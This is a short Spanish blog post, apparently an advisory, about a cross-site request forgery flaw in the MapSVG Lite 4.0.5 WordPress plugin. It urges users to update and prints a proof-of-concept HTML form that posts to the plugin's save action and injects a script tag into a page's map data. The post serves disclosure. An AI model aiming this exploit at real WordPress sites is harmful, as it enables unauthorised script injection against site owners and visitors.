MapSVG Lite 4.0.5 Cross-Site Request Forgery

Si usas mapas interactivos MapSVG es una solución muy interesante para integrarlos en tu WordPress, pero mantén en sus últimas versiones porque en alguna anterior existe la posibilidad de un ataque cruzado.

Básicamente, puedes inyectar contenido script en cualquier contenido de tu sitio mediante una simple inyección. Este ejemplo podría servir para el contenido “10” de WordPress. Para hacer la prueba lo mejor sería que fuera una página.

<form method="POST" action="http://localhost/wp-admin/admin-ajax.php?action=mapsvg_save">
<input type="text" name="data[title]" value="A bad value">
<input type="text" name="data[mapsvg_data]" value="<script>alert('hello')</script>">
<input type="text" name="data[map_id]" value="10">
<input type="submit">
</form>

Con esto conseguirías inyectar en el título de la página además del script.

WPVDB ID: 9198

Deja un comentario